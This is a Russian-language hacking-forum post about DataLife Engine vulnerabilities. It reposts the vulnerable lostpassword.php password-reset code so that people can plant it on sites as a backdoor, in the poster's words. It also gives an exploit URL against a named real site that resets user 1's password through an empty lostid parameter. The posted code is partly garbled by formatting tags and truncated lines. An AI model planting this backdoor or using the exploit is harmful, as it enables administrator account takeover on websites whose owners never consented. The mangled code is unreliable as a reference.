ANTICHAT - Показать сообщение отдельно - [ Обзор уязвимостей DataLife Engine ]

Цитата:

Сообщение от Eviler

ребят, у кого осталась уязвимая версия lostpassword.php для 8,2 или кто может сделать такую же темку для 8,3?) надо прикрутить на сайт)

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]super_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT lostid FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_lostdb WHERE lostname='[/COLOR][COLOR="#0000BB"]$douser[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);

    

    if([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lostid'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#0000BB"]$lostid[/COLOR][COLOR="#007700"]) {

        

[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]super_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT name FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_users WHERE user_id='[/COLOR][COLOR="#0000BB"]$douser[/COLOR][COLOR="#DD0000"]' LIMIT 0,1"[/COLOR][COLOR="#007700"]);

        

[/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]];

        

[/COLOR][COLOR="#0000BB"]$salt[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"012"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]srand[/COLOR][COLOR="#007700"]( ( double )[/COLOR][COLOR="#0000BB"]microtime[/COLOR][COLOR="#007700"]() *[/COLOR][COLOR="#0000BB"]1000000[/COLOR][COLOR="#007700"]);

        

        for([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"UPDATE "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_users set password='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$new_pass[/COLOR][COLOR="#007700"]) ) .[/COLOR][COLOR="#DD0000"]"', allowed_ip = '' WHERE user_id='[/COLOR][COLOR="#0000BB"]$douser[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"DELETE FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_lostdb WHERE lostname='[/COLOR][COLOR="#0000BB"]$douser[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);

        

[/COLOR][COLOR="#0000BB"]msgbox[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lost_gen'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]lost_npass[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]

[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]lost_login[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]&nbsp;&nbsp;[/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#DD0000"]
[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]lost_pass[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"][/COLOR][COLOR="#0000BB"]$new_pass[/COLOR][COLOR="#DD0000"]

[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]lost_info[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

    

    } else {

[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"DELETE FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_lostdb WHERE lostname='[/COLOR][COLOR="#0000BB"]$douser[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]msgbox[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'all_err_1'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lost_err'[/COLOR][COLOR="#007700"]] );

    }

    

} elseif( isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'submit_lost'[/COLOR][COLOR="#007700"]] ) ) {

    

    if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sec_code'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sec_code_session'[/COLOR][COLOR="#007700"]] or ![/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sec_code_session'[/COLOR][COLOR="#007700"]] ) {

        

[/COLOR][COLOR="#0000BB"]msgbox[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'all_err_1'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'reg_err_19'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]"

[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]all_prev[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

    

    } else {

        

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sec_code_session'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$lostname[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]safesql[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lostname'[/COLOR][COLOR="#007700"]] );

        

        if([/COLOR][COLOR="#0000BB"]ereg[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'^[-!#$%&\'*+\\./0-9=?A-Z^_`a-z{|}~]+'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'@'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'[-!#$%&\'*+\\/0-9=?A-Z^_`a-z{|}~]+\.'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'[-!#$%&\'*+\\./0-9=?A-Z^_`a-z{|}~]+$'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$lostname[/COLOR][COLOR="#007700"]) )[/COLOR][COLOR="#0000BB"]$search[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"email = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$lostname[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"];

        else[/COLOR][COLOR="#0000BB"]$search[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"name = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$lostname[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"];

        

[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT user_id, email, name FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_users where[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$search[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]LIMIT 0,1"[/COLOR][COLOR="#007700"]);

        

        if([/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]num_rows[/COLOR][COLOR="#007700"]() >[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {

            

            include_once[/COLOR][COLOR="#0000BB"]ENGINE_DIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/classes/mail.class.php'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$mail[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]dle_mail[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]);

            

[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_row[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]free[/COLOR][COLOR="#007700"]();

            

[/COLOR][COLOR="#0000BB"]$lostmail[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'email'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$userid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_id'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$lostname[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]];

            

[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]super_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT template FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_email where name='lost_mail' LIMIT 0,1"[/COLOR][COLOR="#007700"]);

            

[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'template'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'template'[/COLOR][COLOR="#007700"]] );

            

[/COLOR][COLOR="#0000BB"]$salt[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"012"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]srand[/COLOR][COLOR="#007700"]( ( double )[/COLOR][COLOR="#0000BB"]microtime[/COLOR][COLOR="#007700"]() *[/COLOR][COLOR="#0000BB"]1000000[/COLOR][COLOR="#007700"]);

            

            for([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"DELETE FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_lostdb WHERE lostname='[/COLOR][COLOR="#0000BB"]$userid[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);

            

[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"INSERT INTO "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_lostdb (lostname, lostid) values ('[/COLOR][COLOR="#0000BB"]$userid[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#0000BB"]$lostid[/COLOR][COLOR="#DD0000"]')"[/COLOR][COLOR="#007700"]);

            

[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'template'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"{%username%}"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$lostname[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'template'[/COLOR][COLOR="#007700"]] );

[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'template'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"{%lostlink%}"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$lostlink[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'template'[/COLOR][COLOR="#007700"]] );

[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'template'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"{%ip%}"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REMOTE_ADDR'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'template'[/COLOR][COLOR="#007700"]] );

            

[/COLOR][COLOR="#0000BB"]$mail[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]send[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$lostmail[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lost_subj'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'template'[/COLOR][COLOR="#007700"]] );

            

            if([/COLOR][COLOR="#0000BB"]$mail[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]send_error[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]msgbox[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'all_info'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$mail[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]smtp_msg[/COLOR][COLOR="#007700"]);

            else[/COLOR][COLOR="#0000BB"]msgbox[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lost_ms'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lost_ms_1'[/COLOR][COLOR="#007700"]] );

        

        } else {

[/COLOR][COLOR="#0000BB"]msgbox[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'all_err_1'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lost_err_1'[/COLOR][COLOR="#007700"]] );

        }

    }

} else {

[/COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]load_template[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'lostpassword.tpl'[/COLOR][COLOR="#007700"]);

    

[/COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]set[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'{code}'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"
[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'reload_code'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

    

[/COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]copy_template[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]copy_template[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"

"[/COLOR][COLOR="#007700"];

    

[/COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]copy_template[/COLOR][COLOR="#007700"].= 

[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'reload_code'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]';

};

//-->

[/COLOR][COLOR="#007700"]HTML;

    

[/COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]compile[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'content'[/COLOR][COLOR="#007700"]);

    

[/COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]clear[/COLOR][COLOR="#007700"]();

}

[/COLOR][COLOR="#0000BB"]?>

[/COLOR]

[/COLOR]

Сканер сайтов по данной уязвимости, на данный момент таких осталось ~ 4%

Но для своих бекдоров в самый раз.

Пример:

tomtel.org/index.php?do=lostpassword&douser=1&lostid=

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/COLOR]

[/COLOR]